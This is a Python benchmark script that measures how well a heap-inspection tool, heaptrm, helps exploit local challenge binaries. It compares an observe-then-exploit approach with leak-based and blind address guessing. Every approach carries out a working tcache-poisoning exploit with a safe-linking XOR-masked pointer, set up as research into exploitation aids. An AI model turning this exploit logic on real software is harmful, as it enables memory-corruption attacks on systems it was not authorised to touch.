| |
| """ |
| observe_once_benchmark.py — The right architecture for heaptrm. |
| |
| Not an iterative tool loop. Instead: |
| 1. Observe heap layout once (heaptrm) |
| 2. Compute exploit from observations (deterministic) |
| 3. Execute exploit script against fresh binary |
| |
| Compare: |
| Approach A: observe → compute → exploit (has addresses) |
| Approach B: guess → exploit (no addresses) |
| |
| This is the fair test: does one observation call unlock exploitation |
| that's otherwise impossible? |
| """ |
|
|
| import subprocess |
| import json |
| import struct |
| import os |
| import time |
| from pathlib import Path |
| from dataclasses import dataclass |
|
|
# Directory two levels above this script; every other path is derived from it.
ROOT = Path(__file__).parent.parent
# Folder that main() reads manifest.json and the challenge binaries from.
SUITE = ROOT.joinpath("cve_tests", "suite")
# heaptrm executable under heaptrm-cli/target/release, stored as a plain
# string because it is used directly as argv[0] for subprocess.
HEAPTRM = str(ROOT.joinpath("heaptrm-cli", "target", "release", "heaptrm"))
|
|
|
|
@dataclass
class Result:
    """Record describing the outcome of one exploitation attempt.

    NOTE(review): nothing in the visible part of this file constructs or
    reads this class (main() collects plain dicts instead) — confirm whether
    it is still needed.
    """
    challenge: str   # presumably the challenge/binary name — confirm against callers
    difficulty: str  # presumably the manifest difficulty label — confirm
    approach: str    # presumably which strategy produced this record — confirm
    success: bool    # whether the attempt succeeded
    info: str        # free-form detail text
|
|
|
|
def observe_heap(binary: str, size_class: int) -> dict:
    """Run one heaptrm session against *binary* and report chunk addresses.

    The session allocates slots 0-2 with ``size_class``, frees slots 0 and 1,
    asks heaptrm for an observation and then quits.

    Args:
        binary: Path of the target binary handed to heaptrm.
        size_class: Size-class argument used in the three allocation commands.

    Returns:
        ``{"freed": [(index, address), ...], "allocated": [(index, address),
        ...], "all_chunks": [...]}`` taken from the most recent response that
        reports at least two freed chunks and contains both freed and
        allocated chunks; ``{}`` when no response qualifies.

    Raises:
        OSError: if the heaptrm executable itself cannot be started.
    """
    commands = [
        {"action": "send", "data": f"1 0 {size_class}\n"},
        {"action": "send", "data": f"1 1 {size_class}\n"},
        {"action": "send", "data": f"1 2 {size_class}\n"},
        {"action": "send", "data": "4 0\n"},
        {"action": "send", "data": "4 1\n"},
        {"action": "observe"},
        {"action": "quit"},
    ]
    return _extract_layout(_drive_heaptrm(binary, commands))


def _drive_heaptrm(binary, commands, timeout=5):
    """Send each JSON command to heaptrm and collect one JSON reply per command."""
    proc = subprocess.Popen(
        [HEAPTRM, binary],
        stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
        text=True,
    )
    responses = []
    try:
        for cmd in commands:
            proc.stdin.write(json.dumps(cmd) + "\n")
            proc.stdin.flush()
            line = proc.stdout.readline()
            if not line:
                # EOF: heaptrm has exited, so further writes would only fail.
                break
            try:
                responses.append(json.loads(line))
            except json.JSONDecodeError:
                # A non-JSON line is ignored rather than aborting the session.
                continue
    except OSError:
        # Broken pipe while writing: keep whatever was collected so far.
        pass
    finally:
        # Always release the pipes and reap the child; a heaptrm process that
        # ignores "quit" is killed instead of being leaked.
        try:
            proc.stdin.close()
        except OSError:
            pass
        try:
            proc.wait(timeout=timeout)
        except subprocess.TimeoutExpired:
            proc.kill()
            proc.wait()
        proc.stdout.close()
    return responses


def _extract_layout(responses):
    """Pick the newest response with >= 2 freed chunks and split it by state."""
    for resp in reversed(responses):
        heap = resp.get("heap") if isinstance(resp, dict) else None
        if not heap or heap.get("freed", 0) < 2:
            continue
        chunks = heap.get("chunks") or []
        freed = [(c["index"], int(c["address"], 16))
                 for c in chunks if c["state"] == "freed"]
        allocated = [(c["index"], int(c["address"], 16))
                     for c in chunks if c["state"] == "allocated"]
        if freed and allocated:
            return {"freed": freed, "allocated": allocated, "all_chunks": chunks}
    return {}
|
|
|
|
def exploit_with_observation(binary: str, obs: dict, size_class: int) -> bool:
    """Compute a poisoned forward pointer from observed addresses and run it.

    Args:
        binary: Path of the target binary, started fresh for this attempt.
        obs: Result of ``observe_heap``; needs non-empty ``"freed"`` and
            ``"allocated"`` lists of ``(index, address)`` pairs.
        size_class: Size-class argument used in every allocation command.

    Returns:
        True when the hex of ``PWNED`` appears in the binary's stdout. False
        when the observation is incomplete, the pointer does not fit in 64
        bits, the binary cannot be launched, or it does not finish within
        5 seconds. A hung or crashed target is a failed trial, not a reason
        to abort the benchmark.
    """
    if not obs.get("freed") or not obs.get("allocated"):
        return False

    # The highest-addressed freed chunk is the one whose pointer is rewritten;
    # the highest-addressed allocated chunk is the address it is redirected to.
    chunk1_addr = max(addr for _, addr in obs["freed"])
    target_addr = max(addr for _, addr in obs["allocated"])

    # The stored pointer is the target XORed with (chunk address >> 12).
    poisoned_fd = target_addr ^ (chunk1_addr >> 12)
    try:
        fd_hex = struct.pack("<Q", poisoned_fd).hex()
    except struct.error:
        return False

    # Same alloc/free prefix as the observation run, then: overwrite slot 1,
    # allocate twice, write "PWNED!!\n" through slot 4 and dump slot 2.
    commands = (
        f"1 0 {size_class}\n"
        f"1 1 {size_class}\n"
        f"1 2 {size_class}\n"
        "4 0\n"
        "4 1\n"
        f"2 1 {fd_hex}\n"
        f"1 3 {size_class}\n"
        f"1 4 {size_class}\n"
        "2 4 50574e454421210a\n"
        "3 2\n"
        "5\n"
    )

    try:
        proc = subprocess.run(
            [binary], input=commands.encode(),
            capture_output=True, timeout=5,
        )
    except (subprocess.TimeoutExpired, OSError):
        return False

    return b"50574e4544" in proc.stdout
|
|
|
|
def exploit_blind(binary: str, size_class: int) -> bool:
    """Attempt the same poisoning script with guessed addresses only.

    For each candidate offset the chunk address is guessed as
    ``0x555555559000 + offset + 0x50`` and the target as 0x50 bytes above it;
    the binary is started fresh for every guess.

    Args:
        binary: Path of the target binary.
        size_class: Size-class argument used in every allocation command.

    Returns:
        True as soon as one guess makes the hex of ``PWNED`` appear in the
        binary's stdout, False when every guess fails. A guess that exceeds
        the 5 second timeout counts as a miss and the next guess is tried; a
        binary that cannot be launched at all yields False immediately.
    """
    guess_base = 0x555555559000
    offsets_to_try = (0x2a0, 0x300, 0x350, 0x400, 0x450, 0x500, 0x550, 0x600,
                      0x650, 0x700, 0x750, 0x800, 0x850, 0x900)

    for offset in offsets_to_try:
        chunk1_guess = guess_base + offset + 0x50
        target_guess = chunk1_guess + 0x50
        # Stored pointer is the target XORed with (chunk address >> 12).
        poisoned = target_guess ^ (chunk1_guess >> 12)
        fd_hex = struct.pack("<Q", poisoned).hex()

        commands = (
            f"1 0 {size_class}\n"
            f"1 1 {size_class}\n"
            f"1 2 {size_class}\n"
            "4 0\n"
            "4 1\n"
            f"2 1 {fd_hex}\n"
            f"1 3 {size_class}\n"
            f"1 4 {size_class}\n"
            "2 4 50574e454421210a\n"
            "3 2\n"
            "5\n"
        )

        try:
            proc = subprocess.run(
                [binary], input=commands.encode(),
                capture_output=True, timeout=5,
            )
        except subprocess.TimeoutExpired:
            # A wrong guess may hang the target; move on to the next one.
            continue
        except OSError:
            # The binary cannot be started, so no other guess can work either.
            return False

        if b"50574e4544" in proc.stdout:
            return True

    return False
|
|
|
|
def exploit_blind_with_leak(binary: str, size_class: int, config: dict) -> bool:
    """Attempt the poisoning without heaptrm, using only what the binary prints.

    Address sources are tried in this order:
      1. addresses printed in the replies to the allocations of slots 1 and 2;
      2. the first 8 bytes dumped from freed slot 1, un-XORed with a guessed
         key and accepted only inside a plausible heap range;
      3. the address printed for slot 0, with fixed 0x50 / 0xa0 offsets.

    Args:
        binary: Path of the target binary, driven interactively via pwntools.
        size_class: Size-class argument used in every allocation command.
        config: Manifest entry for the challenge (currently unused).

    Returns:
        True when the hex of ``PWNED`` appears in the dump of slot 2. False
        when no address source is usable or the interaction fails.
    """
    # Imported inside the function, so pwntools is only required when this
    # approach actually runs.
    from pwn import context, p64, process as pwn_process
    context.log_level = "error"

    p = pwn_process(binary)

    def cmd(line):
        """Send one menu line and return the stripped first reply line."""
        p.sendline(line.encode())
        return p.recvline(timeout=1).strip()

    def parse_addr(reply):
        """Return the first 0x-prefixed hex number in *reply*, or None."""
        if not reply or b"0x" not in reply:
            return None
        try:
            return int(reply.split(b"0x")[1].split()[0], 16)
        except (ValueError, IndexError):
            return None

    try:
        # Menu protocol: "1 slot size" allocates, "4 slot" frees,
        # "2 slot hex" edits, "3 slot" shows.
        addr0, addr1, addr2 = [
            parse_addr(cmd(f"1 {slot} {size_class}")) for slot in range(3)
        ]

        cmd("4 0")
        cmd("4 1")

        # Read freed slot 1 back. The dump is hex of raw memory bytes (edits
        # are sent as p64(...).hex() and dumps are matched against raw-byte
        # hex), so the pointer must be decoded little-endian.
        leak = cmd("3 1")
        leaked_fd = None
        if leak and leak not in (b"DELETED", b"ERR") and len(leak) >= 16:
            try:
                leaked_fd = int.from_bytes(
                    bytes.fromhex(leak[:16].decode("ascii")), "little"
                )
            except ValueError:
                leaked_fd = None

        # Truthiness is intentional: a parsed address of 0 is treated as
        # "no address" and falls through to the next source.
        if addr1 and addr2:
            poisoned = addr2 ^ (addr1 >> 12)
        elif leaked_fd:
            guess_key = 0x555555559
            chunk0 = leaked_fd ^ guess_key
            if not 0x555555550000 < chunk0 < 0x555555570000:
                return False
            poisoned = (chunk0 + 0xa0) ^ guess_key
        elif addr0:
            poisoned = (addr0 + 0xa0) ^ ((addr0 + 0x50) >> 12)
        else:
            return False

        cmd(f"2 1 {p64(poisoned).hex()}")
        cmd(f"1 3 {size_class}")
        cmd(f"1 4 {size_class}")
        marker_hex = b"PWNED!!".hex()
        cmd(f"2 4 {marker_hex}")
        result = cmd("3 2")
        return b"50574e4544" in result
    except Exception:
        # Best effort: any failure while talking to the target (EOF, crash,
        # unpackable pointer) is a failed trial. Unlike a bare ``except``,
        # KeyboardInterrupt and SystemExit still propagate.
        return False
    finally:
        # Close the process on every path; a failing close must not mask the
        # trial result.
        try:
            p.close()
        except Exception:
            pass
|
|
|
|
def main():
    """Run all three approaches on every challenge and report success rates.

    Reads ``manifest.json`` from ``SUITE``, skips entries whose binary does
    not exist, and runs ``TRIALS`` attempts each of: heaptrm observe-then-
    exploit, blind-with-leak, and blind guessing. Prints one line per
    challenge, a per-difficulty and overall summary, and writes the raw
    counts to ``bench/observe_once_results.json`` (relative to the current
    working directory).

    When no challenge binary is found, a notice is printed and the summary
    and results file are skipped (the summary would otherwise divide by zero).
    """
    manifest = json.loads((SUITE / "manifest.json").read_text())
    TRIALS = 10

    print("=" * 80)
    print("OBSERVE-ONCE BENCHMARK: heaptrm observe → exploit vs blind")
    print(f"{len(manifest)} challenges × {TRIALS} trials")
    print("=" * 80)

    results = []

    for config in manifest:
        name = config["name"]
        binary = str(SUITE / name)
        if not Path(binary).exists():
            continue

        sc = 1

        # Approach 1: one heaptrm observation, then a computed exploit.
        ht_wins = 0
        for _ in range(TRIALS):
            obs = observe_heap(binary, sc)
            if obs and exploit_with_observation(binary, obs, sc):
                ht_wins += 1

        # Approach 2: no heaptrm, but use whatever the binary itself leaks.
        bl_wins = 0
        for _ in range(TRIALS):
            if exploit_blind_with_leak(binary, sc, config):
                bl_wins += 1

        # Approach 3: pure address guessing.
        guess_wins = 0
        for _ in range(TRIALS):
            if exploit_blind(binary, sc):
                guess_wins += 1

        # Marker reflects heaptrm's lead over pure guessing.
        delta_blind = ht_wins - guess_wins
        marker = ">>>" if delta_blind > TRIALS * 0.5 else ">" if delta_blind > 0 else "=="

        results.append({
            "name": name, "difficulty": config["difficulty"],
            "ht": ht_wins, "leak": bl_wins, "blind": guess_wins,
            "uaf_read": config["uaf_read"], "addr_leak": config["addr_leak"],
            "noise": f"{config['noise_min']}-{config['noise_max']}",
        })

        print(f" {name} [{config['difficulty']:8s}] "
              f"heaptrm={ht_wins}/{TRIALS} "
              f"w/leak={bl_wins}/{TRIALS} "
              f"blind={guess_wins}/{TRIALS} "
              f"| leak={config['addr_leak']:7s} uaf={config['uaf_read']} "
              f"noise={config['noise_min']}-{config['noise_max']} {marker}")

    if not results:
        print(f"\nNo challenge binaries found under {SUITE}; nothing to summarize.")
        return

    def pct(rows, key):
        """Success percentage of *key* over a non-empty list of result rows."""
        return sum(r[key] for r in rows) / (len(rows) * TRIALS) * 100

    print("\n" + "=" * 80)
    print("SUMMARY")
    print("=" * 80)
    print(f"{'Difficulty':10s} {'heaptrm':>10s} {'w/leak':>10s} {'blind':>10s}")
    print("-" * 45)

    for diff in ["easy", "medium", "hard", "extreme"]:
        group = [r for r in results if r["difficulty"] == diff]
        if not group:
            continue
        print(f"{diff:10s} {pct(group, 'ht'):9.0f}% "
              f"{pct(group, 'leak'):9.0f}% {pct(group, 'blind'):9.0f}%")

    print(f"{'OVERALL':10s} {pct(results, 'ht'):9.0f}% "
          f"{pct(results, 'leak'):9.0f}% {pct(results, 'blind'):9.0f}%")

    Path("bench").mkdir(exist_ok=True)
    with open("bench/observe_once_results.json", "w") as f:
        json.dump(results, f, indent=2)
    print("\nSaved to bench/observe_once_results.json")
|
|
|
|
# Run the benchmark only when this file is executed as a script, not when it
# is imported as a module.
if __name__ == "__main__":
    main()
|
|